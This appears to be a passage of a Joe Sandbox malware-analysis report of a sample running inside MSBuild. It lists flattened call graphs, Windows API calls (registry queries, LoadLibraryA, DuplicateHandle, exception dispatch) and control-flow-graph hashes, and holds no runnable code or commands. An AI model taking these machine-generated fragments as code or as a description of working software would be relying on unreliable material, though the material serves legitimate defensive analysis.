44537->44493 44538 6824e60 5 API calls 44538->44540 44539 68274ef 44539->44537 44545 61eae08 5 API calls 44539->44545 44546 61eadf9 5 API calls 44539->44546 44547 61eaf70 5 API calls 44539->44547 44540->44536 44540->44538 44540->44539 44541 6827604 44542 6827620 44541->44542 44543 61eb730 5 API calls 44541->44543 44544 61eb720 5 API calls 44541->44544 44542->44493 44543->44542 44544->44542 44545->44541 44546->44541 44547->44541 44550 68272da 44548->44550 44549 68274e4 44549->44493 44550->44549 44551 6824e60 5 API calls 44550->44551 44553 68274ef 44550->44553 44551->44550 44552 6827521 44552->44493 44553->44552 44556 61eae08 5 API calls 44553->44556 44557 61eadf9 5 API calls 44553->44557 44558 61eaf70 5 API calls 44553->44558 44554 6827604 44555 6827620 44554->44555 44559 61eb730 5 API calls 44554->44559 44560 61eb720 5 API calls 44554->44560 44555->44493 44556->44554 44557->44554 44558->44554 44559->44555 44560->44555 44563 68251e7 44561->44563 44562 682531c 44562->44514 44563->44562 44564 6825e28 RegQueryValueExW 44563->44564 44565 6825dd8 RegQueryValueExW 44563->44565 44651 6825b70 44563->44651 44655 6825b67 44563->44655 44659 6825b21 44563->44659 44564->44563 44565->44563 44570 61eae2c 44569->44570 44573 61eae40 44569->44573 44571 61eae7f 44570->44571 44570->44573 44577 61eae08 5 API calls 44571->44577 44578 61eadf9 5 API calls 44571->44578 44579 61eaf70 5 API calls 44571->44579 44572 61eae90 44574 61eae51 44572->44574 44575 61eb730 5 API calls 44572->44575 44576 61eb720 5 API calls 44572->44576 44573->44574 44580 61eae08 5 API calls 44573->44580 44581 61eadf9 5 API calls 44573->44581 44582 61eaf70 5 API calls 44573->44582 44574->44512 44575->44574 44576->44574 44577->44572 44578->44572 44579->44572 44580->44574 44581->44574 44582->44574 44584 61eaf80 44583->44584 44585 61eafa4 44584->44585 44586 61eae08 5 API calls 44584->44586 44587 61eadf9 5 API calls 44584->44587 44588 61eaf70 5 API calls 44584->44588 44585->44512 44586->44585 44587->44585 44588->44585 44590 61eae2c 44589->44590 44593 61eae40 44589->44593 44591 61eae7f 44590->44591 44590->44593 44597 61eae08 5 API calls 44591->44597 44598 61eadf9 5 API calls 44591->44598 44599 61eaf70 5 API calls 44591->44599 44592 61eae90 44594 61eae51 44592->44594 44595 61eb730 5 API calls 44592->44595 44596 61eb720 5 API calls 44592->44596 44593->44594 44600 61eae08 5 API calls 44593->44600 44601 61eadf9 5 API calls 44593->44601 44602 61eaf70 5 API calls 44593->44602 44594->44512 44595->44594 44596->44594 44597->44592 44598->44592 44599->44592 44600->44594 44601->44594 44602->44594 44605 61eb730 44603->44605 44604 61eb878 44606 61eb78f 44604->44606 44612 61eb730 5 API calls 44604->44612 44613 61eb720 5 API calls 44604->44613 44674 61ebe91 44604->44674 44605->44604 44605->44606 44615 61eb730 5 API calls 44605->44615 44616 61eb720 5 API calls 44605->44616 44606->44513 44607 61eb847 44607->44604 44607->44606 44664 61ec480 44607->44664 44669 61ec472 44607->44669 44608 61ebdd7 44608->44513 44609 61ebd86 44609->44608 44617 61ec472 5 API calls 44609->44617 44618 61ec480 5 API calls 44609->44618 44612->44609 44613->44609 44615->44607 44616->44607 44617->44609 44618->44609 44621 61eb76c 44619->44621 44622 61eb878 44619->44622 44620 61eb847 44620->44622 44624 61eb78f 44620->44624 44628 61ec472 5 API calls 44620->44628 44629 61ec480 5 API calls 44620->44629 44621->44622 44621->44624 44633 61eb730 5 API calls 44621->44633 44634 61eb720 5 API calls 44621->44634 44622->44624 44630 61eb730 5 API calls 44622->44630 44631 61eb720 5 API calls 44622->44631 44632 61ebe91 5 API calls 44622->44632 44623 61ebdd7 44623->44513 44624->44513 44625 61ebd86 44625->44623 44626 61ec472 5 API calls 44625->44626 44627 61ec480 5 API calls 44625->44627 44626->44625 44627->44625 44628->44622 44629->44622 44630->44625 44631->44625 44632->44625 44633->44620 44634->44620 44637 6824e6f 44635->44637 44636 6824e71 44636->44514 44637->44636 44646 6824e60 5 API calls 44637->44646 44647 68251d0 5 API calls 44637->44647 44707 6824eb0 44637->44707 44721 6824e4f 44637->44721 44737 6825168 44637->44737 44745 6824f4e 44637->44745 44638 6824ecb 44639 68251a2 44638->44639 44640 6825e28 RegQueryValueExW 44638->44640 44641 6825dd8 RegQueryValueExW 44638->44641 44642 6825b70 RegOpenKeyExW 44638->44642 44643 6825b21 RegOpenKeyExW 44638->44643 44644 6825b67 RegOpenKeyExW 44638->44644 44639->44514 44640->44638 44641->44638 44642->44638 44643->44638 44644->44638 44646->44638 44647->44638 44652 6825bc2 RegOpenKeyExW 44651->44652 44654 6825c36 44652->44654 44656 6825b55 RegOpenKeyExW 44655->44656 44658 6825c36 44656->44658 44658->44658 44660 6825b54 RegOpenKeyExW 44659->44660 44661 6825b31 44659->44661 44663 6825c36 44660->44663 44661->44563 44663->44663 44665 61ec81a 44664->44665 44666 61ec4ab 44664->44666 44665->44604 44666->44665 44679 61ed008 44666->44679 44684 61ecff7 44666->44684 44670 61ec81a 44669->44670 44671 61ec4ab 44669->44671 44670->44604 44671->44670 44672 61ed008 5 API calls 44671->44672 44673 61ecff7 5 API calls 44671->44673 44672->44671 44673->44671 44676 61ebebd 44674->44676 44675 61ebee8 44675->44609 44676->44675 44677 61ec472 5 API calls 44676->44677 44678 61ec480 5 API calls 44676->44678 44677->44676 44678->44676 44680 61ed024 44679->44680 44681 61ed01a 44679->44681 44680->44681 44689 61ed1f8 44680->44689 44694 61ed340 44680->44694 44681->44666 44685 61ed024 44684->44685 44686 61ed01a 44684->44686 44685->44686 44687 61ed1f8 5 API calls 44685->44687 44688 61ed340 5 API calls 44685->44688 44686->44666 44687->44686 44688->44686 44690 61ed207 44689->44690 44691 61ed2ad 44690->44691 44698 61ed448 44690->44698 44702 61ed439 44690->44702 44691->44681 44696 61ed448 5 API calls 44694->44696 44697 61ed439 5 API calls 44694->44697 44695 61ed366 44695->44681 44696->44695 44697->44695 44700 61ed461 44698->44700 44699 61ed53d 44699->44691 44700->44699 44701 69b0778 RegOpenKeyExW RegOpenKeyExW RegOpenKeyExW RegQueryValueExW RegQueryValueExW 44700->44701 44701->44699 44704 61ed3f5 44702->44704 44705 61ed442 44702->44705 44703 61ed53d 44703->44691 44704->44691 44705->44703 44706 69b0778 RegOpenKeyExW RegOpenKeyExW RegOpenKeyExW RegQueryValueExW RegQueryValueExW 44705->44706 44706->44703 44710 6824eb0 5 API calls 44707->44710 44711 6824e60 5 API calls 44707->44711 44712 68251d0 5 API calls 44707->44712 44713 6825168 5 API calls 44707->44713 44714 6824f4e 5 API calls 44707->44714 44715 6824e4f 5 API calls 44707->44715 44708 68251a2 44708->44638 44709 6824ed0 44709->44708 44716 6825e28 RegQueryValueExW 44709->44716 44717 6825dd8 RegQueryValueExW 44709->44717 44718 6825b70 RegOpenKeyExW 44709->44718 44719 6825b21 RegOpenKeyExW 44709->44719 44720 6825b67 RegOpenKeyExW 44709->44720 44710->44709 44711->44709 44712->44709 44713->44709 44714->44709 44715->44709 44716->44709 44717->44709 44718->44709 44719->44709 44720->44709 44723 6824e53 44721->44723 44722 6824e71 44722->44638 44723->44722 44731 6824eb0 5 API calls 44723->44731 44732 6824e60 5 API calls 44723->44732 44733 68251d0 5 API calls 44723->44733 44734 6825168 5 API calls 44723->44734 44735 6824f4e 5 API calls 44723->44735 44736 6824e4f 5 API calls 44723->44736 44724 6824ecb 44725 68251a2 44724->44725 44726 6825e28 RegQueryValueExW 44724->44726 44727 6825dd8 RegQueryValueExW 44724->44727 44728 6825b70 RegOpenKeyExW 44724->44728 44729 6825b21 RegOpenKeyExW 44724->44729 44730 6825b67 RegOpenKeyExW 44724->44730 44725->44638 44726->44724 44727->44724 44728->44724 44729->44724 44730->44724 44731->44724 44732->44724 44733->44724 44734->44724 44735->44724 44736->44724 44738 6824f09 44737->44738 44739 68251a2 44738->44739 44740 6825e28 RegQueryValueExW 44738->44740 44741 6825dd8 RegQueryValueExW 44738->44741 44742 6825b70 RegOpenKeyExW 44738->44742 44743 6825b21 RegOpenKeyExW 44738->44743 44744 6825b67 RegOpenKeyExW 44738->44744 44739->44638 44740->44738 44741->44738 44742->44738 44743->44738 44744->44738 44747 6824f09 44745->44747 44746 68251a2 44746->44638 44747->44746 44748 6825e28 RegQueryValueExW 44747->44748 44749 6825dd8 RegQueryValueExW 44747->44749 44750 6825b70 RegOpenKeyExW 44747->44750 44751 6825b21 RegOpenKeyExW 44747->44751 44752 6825b67 RegOpenKeyExW 44747->44752 44748->44747 44749->44747 44750->44747 44751->44747 44752->44747 44754 6825de9 44753->44754 44755 6825e0c RegQueryValueExW 44753->44755 44754->44481 44757 6825ef3 44755->44757 44757->44757 44760 61e928d 44758->44760 44759 61e9697 44759->44188 44760->44759 44780 61ead67 44760->44780 44786 61eabd0 44760->44786 44765 61e924d 44763->44765 44764 61e9697 44764->44188 44765->44764 44766 61ead67 5 API calls 44765->44766 44767 61eabd0 5 API calls 44765->44767 44766->44765 44767->44765 44769 6824df7 44768->44769 44771 6824eb0 5 API calls 44769->44771 44772 6824e60 5 API calls 44769->44772 44773 6824e4f 5 API calls 44769->44773 44770 6824e13 44770->44188 44771->44770 44772->44770 44773->44770 44775 6824ddb 44774->44775 44777 6824eb0 5 API calls 44775->44777 44778 6824e60 5 API calls 44775->44778 44779 6824e4f 5 API calls 44775->44779 44776 6824e13 44776->44188 44777->44776 44778->44776 44779->44776 44781 61eacff 44780->44781 44782 61ead72 44780->44782 44781->44760 44784 61eae08 5 API calls 44782->44784 44785 61eadf9 5 API calls 44782->44785 44783 61eadeb 44783->44760 44784->44783 44785->44783 44787 61eabf1 44786->44787 44788 61eac14 44786->44788 44787->44760 44789 61eacb2 44788->44789 44791 61ead67 5 API calls 44788->44791 44792 61ead78 44788->44792 44789->44760 44791->44789 44793 61ead8b 44792->44793 44795 61eae08 5 API calls 44793->44795 44796 61eadf9 5 API calls 44793->44796 44794 61eadeb 44794->44789 44795->44794 44796->44794 44799 6825547 44797->44799 44798 6825791 44798->44317 44799->44798 44800 6825e28 RegQueryValueExW 44799->44800 44801 6825dd8 RegQueryValueExW 44799->44801 44802 6825b70 RegOpenKeyExW 44799->44802 44803 6825b21 RegOpenKeyExW 44799->44803 44804 6825b67 RegOpenKeyExW 44799->44804 44800->44799 44801->44799 44802->44799 44803->44799 44804->44799 44807 6825547 44805->44807 44806 6825791 44806->44317 44807->44806 44808 6825e28 RegQueryValueExW 44807->44808 44809 6825dd8 RegQueryValueExW 44807->44809 44810 6825b70 RegOpenKeyExW 44807->44810 44811 6825b21 RegOpenKeyExW 44807->44811 44812 6825b67 RegOpenKeyExW 44807->44812 44808->44807 44809->44807 44810->44807 44811->44807 44812->44807 44815 6825877 44813->44815 44814 6825ae1 44814->44317 44815->44814 44816 6825b70 RegOpenKeyExW 44815->44816 44817 6825b21 RegOpenKeyExW 44815->44817 44818 6825b67 RegOpenKeyExW 44815->44818 44819 6825e28 RegQueryValueExW 44815->44819 44820 6825dd8 RegQueryValueExW 44815->44820 44816->44815 44817->44815 44818->44815 44819->44815 44820->44815 44823 6825461 44821->44823 44822 6825791 44822->44317 44823->44822 44824 6825e28 RegQueryValueExW 44823->44824 44825 6825dd8 RegQueryValueExW 44823->44825 44826 6825b70 RegOpenKeyExW 44823->44826 44827 6825b21 RegOpenKeyExW 44823->44827 44828 6825b67 RegOpenKeyExW 44823->44828 44824->44823 44825->44823 44826->44823 44827->44823 44828->44823 44829 159add0 44830 159adee 44829->44830 44833 1599dc0 44830->44833 44832 159ae25 44834 159c8f0 LoadLibraryA 44833->44834 44836 159c9cc 44834->44836 44837 1590850 44838 159085d 44837->44838 44841 1591bf0 44838->44841 44840 1590869 44845 1592101 44841->44845 44849 1592110 44841->44849 44842 1591c0b 44842->44840 44846 1592110 44845->44846 44853 15925d0 44846->44853 44847 1592138 44847->44842 44850 159212b 44849->44850 44852 15925d0 5 API calls 44850->44852 44851 1592138 44851->44842 44852->44851 44854 15925fb 44853->44854 44857 1592dd0 5 API calls 44854->44857 44858 1592de0 5 API calls 44854->44858 44855 15926d5 44856 1592652 44856->44855 44859 1592dd0 5 API calls 44856->44859 44860 1592de0 5 API calls 44856->44860 44857->44856 44858->44856 44859->44856 44860->44856 44865 1594540 44866 1594554 44865->44866 44869 159478a 44866->44869 44867 159455d 44870 1594793 44869->44870 44875 159496c 44869->44875 44880 1594986 44869->44880 44885 1594870 44869->44885 44890 159485f 44869->44890 44870->44867 44876 159491f 44875->44876 44876->44875 44877 15949ab 44876->44877 44895 1594c78 44876->44895 44900 1594c67 44876->44900 44877->44877 44881 1594999 44880->44881 44882 15949ab 44880->44882 44883 1594c78 2 API calls 44881->44883 44884 1594c67 2 API calls 44881->44884 44882->44882 44883->44882 44884->44882 44886 15948b4 44885->44886 44887 15949ab 44886->44887 44888 1594c78 2 API calls 44886->44888 44889 1594c67 2 API calls 44886->44889 44888->44887 44889->44887 44891 1594870 44890->44891 44892 15949ab 44891->44892 44893 1594c78 2 API calls 44891->44893 44894 1594c67 2 API calls 44891->44894 44893->44892 44894->44892 44896 1594c86 44895->44896 44905 1594cb9 44896->44905 44909 1594cc8 44896->44909 44897 1594c96 44897->44877 44901 1594c86 44900->44901 44903 1594cb9 RtlEncodePointer 44901->44903 44904 1594cc8 RtlEncodePointer 44901->44904 44902 1594c96 44902->44877 44903->44902 44904->44902 44906 1594d02 44905->44906 44907 1594d2c RtlEncodePointer 44906->44907 44908 1594d55 44906->44908 44907->44908 44908->44897 44910 1594d02 44909->44910 44911 1594d2c RtlEncodePointer 44910->44911 44912 1594d55 44910->44912 44911->44912 44912->44897 44913 69bc860 44914 69bc8c6 44913->44914 44915 69bc975 44914->44915 44917 69bca20 44914->44917 44920 69bc4ec 44917->44920 44921 69bca88 DuplicateHandle 44920->44921 44922 69bca4e 44921->44922 44922->44915
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.523442817.00000000069B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_69b0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 599aab731782737449b0e7cebf222cc22d90a0ac69ab174f240b2014335d4fa7
                                                                                    • Instruction ID: 1863789a1c862269182003372283ea16a386205533e1b6fc5959633ad734cf64
                                                                                    • Opcode Fuzzy Hash: 599aab731782737449b0e7cebf222cc22d90a0ac69ab174f240b2014335d4fa7
                                                                                    • Instruction Fuzzy Hash: B2615E70E10209DBDB54EFB4DA94AEEB7F6AF84305F118428E402AB794DF789C45CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 238 61e70a7-61e70cd 405 61e70cd call 6824eb0 238->405 406 61e70cd call 6824e60 238->406 407 61e70cd call 6825440 238->407 408 61e70cd call 68251d0 238->408 409 61e70cd call 6825757 238->409 410 61e70cd call 682558a 238->410 411 61e70cd call 6825168 238->411 412 61e70cd call 6825858 238->412 413 61e70cd call 6824f4e 238->413 414 61e70cd call 6824e4f 238->414 242 61e70d3-61e710a 415 61e710a call 6826687 242->415 416 61e710a call 68266c8 242->416 245 61e7110-61e7147 427 61e7147 call 6828220 245->427 428 61e7147 call 6828230 245->428 248 61e714d-61e71cb 431 61e71cb call 6828e42 248->431 432 61e71cb call 6828ef0 248->432 254 61e71d1-61e7212 434 61e7212 call 6829700 254->434 435 61e7212 call 6829b10 254->435 436 61e7212 call 68296f1 254->436 437 61e7212 call 6829b71 254->437 257 61e7218-61e7259 383 61e7259 call 682a5b0 257->383 384 61e7259 call 682adf6 257->384 385 61e7259 call 682b247 257->385 386 61e7259 call 682a538 257->386 387 61e7259 call 682ad38 257->387 388 61e7259 call 682ad48 257->388 389 61e7259 call 682b1e8 257->389 260 61e725f-61e72a0 390 61e72a0 call 682c490 260->390 391 61e72a0 call 682c41d 260->391 263 61e72a6-61e72e7 393 61e72e7 call 682c690 263->393 394 61e72e7 call 682c4a1 263->394 395 61e72e7 call 682c6ef 263->395 266 61e72ed-61e73b3 396 61e73b3 call 682c7b0 266->396 397 61e73b3 call 682c750 266->397 398 61e73b3 call 682ce00 266->398 399 61e73b3 call 682cd5e 266->399 275 61e73b9-61e73fa 400 61e73fa call 682dcd0 275->400 401 61e73fa call 682dadf 275->401 278 61e7400-61e7441 402 61e7441 call 682e020 278->402 403 61e7441 call 682df71 278->403 404 61e7441 call 682e398 278->404 281 61e7447-61e7488 417 61e7488 call 682e020 281->417 418 61e7488 call 682e970 281->418 419 61e7488 call 682df71 281->419 420 61e7488 call 682e5d7 281->420 421 61e7488 call 682e874 281->421 422 61e7488 call 682e398 281->422 423 61e7488 call 682e9cf 281->423 284 61e748e-61e74cf 424 61e74cf call 682ea90 284->424 425 61e74cf call 682ea30 284->425 426 61e74cf call 682eaef 284->426 287 61e74d5-61e7516 429 61e7516 call 682ebb0 287->429 430 61e7516 call 682eb50 287->430 290 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 379 61e7d84-61e7dd5 290->379 383->260 384->260 385->260 386->260 387->260 388->260 389->260 390->263 391->263 393->266 394->266 395->266 396->275 397->275 398->275 399->275 400->278 401->278 402->281 403->281 404->281 405->242 406->242 407->242 408->242 409->242 410->242 411->242 412->242 413->242 414->242 415->245 416->245 417->284 418->284 419->284 420->284 421->284 422->284 423->284 424->287 425->287 426->287 427->248 428->248 429->290 430->290 431->254 432->254 434->257 435->257 436->257 437->257
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 5f21419977a5e07771e578a85e0af4a39dd2fb042e68cf9757202b016c2898bc
                                                                                    • Instruction ID: d44ab6f2be022a9fba27f1744bfc6b64773e77f149f94c0b4e0dea135054ad14
                                                                                    • Opcode Fuzzy Hash: 5f21419977a5e07771e578a85e0af4a39dd2fb042e68cf9757202b016c2898bc
                                                                                    • Instruction Fuzzy Hash: 01028434902298CFDBA9EF70D88869DB7B2FF49307F1045E9D50AA6250CB399AC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 438 61e7090 584 61e7090 call 6824eb0 438->584 585 61e7090 call 6824e60 438->585 586 61e7090 call 6825440 438->586 587 61e7090 call 68251d0 438->587 588 61e7090 call 6825168 438->588 589 61e7090 call 6824f4e 438->589 590 61e7090 call 6824e4f 438->590 439 61e7096-61e70cd 591 61e70cd call 6824eb0 439->591 592 61e70cd call 6824e60 439->592 593 61e70cd call 6825440 439->593 594 61e70cd call 68251d0 439->594 595 61e70cd call 6825757 439->595 596 61e70cd call 682558a 439->596 597 61e70cd call 6825168 439->597 598 61e70cd call 6825858 439->598 599 61e70cd call 6824f4e 439->599 600 61e70cd call 6824e4f 439->600 442 61e70d3-61e710a 611 61e710a call 6826687 442->611 612 61e710a call 68266c8 442->612 445 61e7110-61e7147 613 61e7147 call 6828220 445->613 614 61e7147 call 6828230 445->614 448 61e714d-61e71cb 620 61e71cb call 6828e42 448->620 621 61e71cb call 6828ef0 448->621 454 61e71d1-61e7212 623 61e7212 call 6829700 454->623 624 61e7212 call 6829b10 454->624 625 61e7212 call 68296f1 454->625 626 61e7212 call 6829b71 454->626 457 61e7218-61e7259 627 61e7259 call 682a5b0 457->627 628 61e7259 call 682adf6 457->628 629 61e7259 call 682b247 457->629 630 61e7259 call 682a538 457->630 631 61e7259 call 682ad38 457->631 632 61e7259 call 682ad48 457->632 633 61e7259 call 682b1e8 457->633 460 61e725f-61e72a0 636 61e72a0 call 682c490 460->636 637 61e72a0 call 682c41d 460->637 463 61e72a6-61e72e7 638 61e72e7 call 682c690 463->638 639 61e72e7 call 682c4a1 463->639 640 61e72e7 call 682c6ef 463->640 466 61e72ed-61e73b3 641 61e73b3 call 682c7b0 466->641 642 61e73b3 call 682c750 466->642 643 61e73b3 call 682ce00 466->643 644 61e73b3 call 682cd5e 466->644 475 61e73b9-61e73fa 582 61e73fa call 682dcd0 475->582 583 61e73fa call 682dadf 475->583 478 61e7400-61e7441 601 61e7441 call 682e020 478->601 602 61e7441 call 682df71 478->602 603 61e7441 call 682e398 478->603 481 61e7447-61e7488 604 61e7488 call 682e020 481->604 605 61e7488 call 682e970 481->605 606 61e7488 call 682df71 481->606 607 61e7488 call 682e5d7 481->607 608 61e7488 call 682e874 481->608 609 61e7488 call 682e398 481->609 610 61e7488 call 682e9cf 481->610 484 61e748e-61e74cf 615 61e74cf call 682ea90 484->615 616 61e74cf call 682ea30 484->616 617 61e74cf call 682eaef 484->617 487 61e74d5-61e7516 618 61e7516 call 682ebb0 487->618 619 61e7516 call 682eb50 487->619 490 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 579 61e7d84-61e7dd5 490->579 582->478 583->478 584->439 585->439 586->439 587->439 588->439 589->439 590->439 591->442 592->442 593->442 594->442 595->442 596->442 597->442 598->442 599->442 600->442 601->481 602->481 603->481 604->484 605->484 606->484 607->484 608->484 609->484 610->484 611->445 612->445 613->448 614->448 615->487 616->487 617->487 618->490 619->490 620->454 621->454 623->457 624->457 625->457 626->457 627->460 628->460 629->460 630->460 631->460 632->460 633->460 636->463 637->463 638->466 639->466 640->466 641->475 642->475 643->475 644->475
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 3cf080a96b5f56cea495bc3b9ec6c9ae7843060813f86a6884bc22655cc8609d
                                                                                    • Instruction ID: c34f2695ad1e5977639fa6ab875062c218004f273bb25c1a493e3b692a01791a
                                                                                    • Opcode Fuzzy Hash: 3cf080a96b5f56cea495bc3b9ec6c9ae7843060813f86a6884bc22655cc8609d
                                                                                    • Instruction Fuzzy Hash: F9028434902298CFDBA9EF70D88869DB7B2FF49307F1045E9D50A96290DB399AC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 645 61e70e4-61e710a 801 61e710a call 6826687 645->801 802 61e710a call 68266c8 645->802 649 61e7110-61e7147 813 61e7147 call 6828220 649->813 814 61e7147 call 6828230 649->814 652 61e714d-61e71cb 817 61e71cb call 6828e42 652->817 818 61e71cb call 6828ef0 652->818 658 61e71d1-61e7212 820 61e7212 call 6829700 658->820 821 61e7212 call 6829b10 658->821 822 61e7212 call 68296f1 658->822 823 61e7212 call 6829b71 658->823 661 61e7218-61e7259 825 61e7259 call 682a5b0 661->825 826 61e7259 call 682adf6 661->826 827 61e7259 call 682b247 661->827 828 61e7259 call 682a538 661->828 829 61e7259 call 682ad38 661->829 830 61e7259 call 682ad48 661->830 831 61e7259 call 682b1e8 661->831 664 61e725f-61e72a0 786 61e72a0 call 682c490 664->786 787 61e72a0 call 682c41d 664->787 667 61e72a6-61e72e7 789 61e72e7 call 682c690 667->789 790 61e72e7 call 682c4a1 667->790 791 61e72e7 call 682c6ef 667->791 670 61e72ed-61e73b3 792 61e73b3 call 682c7b0 670->792 793 61e73b3 call 682c750 670->793 794 61e73b3 call 682ce00 670->794 795 61e73b3 call 682cd5e 670->795 679 61e73b9-61e73fa 796 61e73fa call 682dcd0 679->796 797 61e73fa call 682dadf 679->797 682 61e7400-61e7441 798 61e7441 call 682e020 682->798 799 61e7441 call 682df71 682->799 800 61e7441 call 682e398 682->800 685 61e7447-61e7488 803 61e7488 call 682e020 685->803 804 61e7488 call 682e970 685->804 805 61e7488 call 682df71 685->805 806 61e7488 call 682e5d7 685->806 807 61e7488 call 682e874 685->807 808 61e7488 call 682e398 685->808 809 61e7488 call 682e9cf 685->809 688 61e748e-61e74cf 810 61e74cf call 682ea90 688->810 811 61e74cf call 682ea30 688->811 812 61e74cf call 682eaef 688->812 691 61e74d5-61e7516 815 61e7516 call 682ebb0 691->815 816 61e7516 call 682eb50 691->816 694 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 783 61e7d84-61e7dd5 694->783 786->667 787->667 789->670 790->670 791->670 792->679 793->679 794->679 795->679 796->682 797->682 798->685 799->685 800->685 801->649 802->649 803->688 804->688 805->688 806->688 807->688 808->688 809->688 810->691 811->691 812->691 813->652 814->652 815->694 816->694 817->658 818->658 820->661 821->661 822->661 823->661 825->664 826->664 827->664 828->664 829->664 830->664 831->664
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 740623e87ebeb54901d839acba74a60bde2e6f743a56740dcce9a4bc2e2b7b81
                                                                                    • Instruction ID: c020b0fd6d39ddfe6b99f9b91508b15ee5436ebc3a746a887338bb4ac907e8bb
                                                                                    • Opcode Fuzzy Hash: 740623e87ebeb54901d839acba74a60bde2e6f743a56740dcce9a4bc2e2b7b81
                                                                                    • Instruction Fuzzy Hash: 89028474902298CFDBA9EF70D88869DB7B2FF49307F1045E9D50AA6250CB399AC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 832 61e7121-61e7147 980 61e7147 call 6828220 832->980 981 61e7147 call 6828230 832->981 836 61e714d-61e71cb 987 61e71cb call 6828e42 836->987 988 61e71cb call 6828ef0 836->988 842 61e71d1-61e7212 990 61e7212 call 6829700 842->990 991 61e7212 call 6829b10 842->991 992 61e7212 call 68296f1 842->992 993 61e7212 call 6829b71 842->993 845 61e7218-61e7259 994 61e7259 call 682a5b0 845->994 995 61e7259 call 682adf6 845->995 996 61e7259 call 682b247 845->996 997 61e7259 call 682a538 845->997 998 61e7259 call 682ad38 845->998 999 61e7259 call 682ad48 845->999 1000 61e7259 call 682b1e8 845->1000 848 61e725f-61e72a0 1003 61e72a0 call 682c490 848->1003 1004 61e72a0 call 682c41d 848->1004 851 61e72a6-61e72e7 1005 61e72e7 call 682c690 851->1005 1006 61e72e7 call 682c4a1 851->1006 1007 61e72e7 call 682c6ef 851->1007 854 61e72ed-61e73b3 1008 61e73b3 call 682c7b0 854->1008 1009 61e73b3 call 682c750 854->1009 1010 61e73b3 call 682ce00 854->1010 1011 61e73b3 call 682cd5e 854->1011 863 61e73b9-61e73fa 1012 61e73fa call 682dcd0 863->1012 1013 61e73fa call 682dadf 863->1013 866 61e7400-61e7441 970 61e7441 call 682e020 866->970 971 61e7441 call 682df71 866->971 972 61e7441 call 682e398 866->972 869 61e7447-61e7488 973 61e7488 call 682e020 869->973 974 61e7488 call 682e970 869->974 975 61e7488 call 682df71 869->975 976 61e7488 call 682e5d7 869->976 977 61e7488 call 682e874 869->977 978 61e7488 call 682e398 869->978 979 61e7488 call 682e9cf 869->979 872 61e748e-61e74cf 982 61e74cf call 682ea90 872->982 983 61e74cf call 682ea30 872->983 984 61e74cf call 682eaef 872->984 875 61e74d5-61e7516 985 61e7516 call 682ebb0 875->985 986 61e7516 call 682eb50 875->986 878 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 967 61e7d84-61e7dd5 878->967 970->869 971->869 972->869 973->872 974->872 975->872 976->872 977->872 978->872 979->872 980->836 981->836 982->875 983->875 984->875 985->878 986->878 987->842 988->842 990->845 991->845 992->845 993->845 994->848 995->848 996->848 997->848 998->848 999->848 1000->848 1003->851 1004->851 1005->854 1006->854 1007->854 1008->863 1009->863 1010->863 1011->863 1012->866 1013->866
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
